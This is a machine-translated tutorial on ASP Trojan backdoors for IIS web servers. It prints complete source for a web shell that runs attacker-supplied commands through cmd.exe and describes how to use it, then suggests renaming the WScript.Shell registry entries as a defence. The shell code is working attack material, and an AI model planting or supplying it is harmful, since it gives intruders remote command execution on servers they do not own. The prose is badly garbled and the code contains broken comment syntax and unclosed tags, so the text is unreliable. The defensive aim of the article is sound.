With the development of ASP technology, the Web site based on ASP technology is more and more, the support of ASP technology can be said to be a basic function of Windows system IIS server. But the backdoor of Trojan Horse based on ASP technology, also more and more, and function also more and more powerful. Because the ASP itself is the server to provide a tribute service function, so this ASP script Trojan door, will not be anti-virus software killing. By hackers are called "never be killed by the back door." Because of its high concealment and difficult to kill, the safety of the site poses a serious threat. Therefore, for the prevention and removal of ASP Trojan, for our network management personnel put forward a higher technical requirements. Below I combine personal experience, talk about two more typical ASP Trojan prevention method, hope for everyone can help.
The following is the code for the first Trojan:
<title> ASP Shell </title>
<%@ Language=vbscript%>
<%
Dim Oscript
Dim oscriptnet
Dim Ofilesys, Ofile
Dim Szcmd, Sztempfile
On Error Resume Next
--Create the COM objects that we'll be using--
Set oscript = Server.CreateObject ("WSCRIPT. SHELL ")
Set oscriptnet = Server.CreateObject ("Wscript.Network")
Set Ofilesys = Server.CreateObject ("Scripting.FileSystemObject")
--Check for a command so we have posted--
Szcmd = Request.Form (". CMD ")
If (Szcmd <> "") Then
--Use a poor mans pipe ... a temp file--
Sztempfile = "C:" & Ofilesys.gettempname ()
Call Oscript.run ("cmd.exe/c" & Szcmd & ">" & Sztempfile, 0, True)
Set ofile = Ofilesys.opentextfile (sztempfile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<form action= "<%= request.servervariables (" URL ")%>" method= "POST"
<input type=text name= ". CMD "size=45 value=" <%= szcmd%> "
<input type=submit value= "Execute command"
</FORM>
<PRE> <%
If (IsObject (ofile)) Then
--Read the output from our command and remove the temp file--
On Error Resume Next
Response.Write Server.HTMLEncode (Ofile.readall)
Ofile.close
Call Ofilesys.deletefile (Sztempfile, True)
End If
%>
</BODY>
</HTML>
Then enter the dir command point execution on the command line to view the directory!! It can use a variety of DOS commands, such as: copy, net, netstat and so on.
However, its default execution permission is only guest, which is the Iusr_computer user's execute permission. Of course, if you add iusr_computer users to the Admins group, you have administrator privileges. The feature of this trojan is that it is very convenient to use. Almost want to be the same as DOS command line window xx. However, if the server restricts the FSO (no component uploads), then it has no way to use it. There is also in the server after the increase in the virtual host can not be used. Can only be used in the default Web site, so it is relatively narrow in scope.
For the precautionary approach let's take a look at its code and know:
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
'建立了一个名为oScript的WSCRIPT.SHELL对象,用于命令的执行"
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
The above three lines of code create Wscript.Shell, Wscript.Network, Scripting.FileSystemObject three objects, we simply rename or delete the items in the registry to control the Wscript.Shell object. The following figure: It is noteworthy: we should put "WSCRIPT." SHELL "Items and" WSCRIPT. SHELL.1 "Both should be renamed or deleted. Because if we only modify "WSCRIPT." SHELL "Item. So the hackers just change the code as follows:
Set oScript = Server.CreateObject("WSCRIPT.SHELL.1")
This backdoor Trojan can be carried out again.
As you may have thought, we are on "WSCRIPT." SHELL "Items and" WSCRIPT. SHELL.1 "When renamed, must be not easy to be guessed by hackers, because for example: you put" WSCRIPT. The SHELL was "changed" to WSCRIPT. SHELL888 ". Hackers just change the code accordingly:
Set oScript = Server.CreateObject("WSCRIPT.SHELL888")
The Trojan horse program can be executed again. There is also a change to the registry after the Web service to restart, the settings will be valid.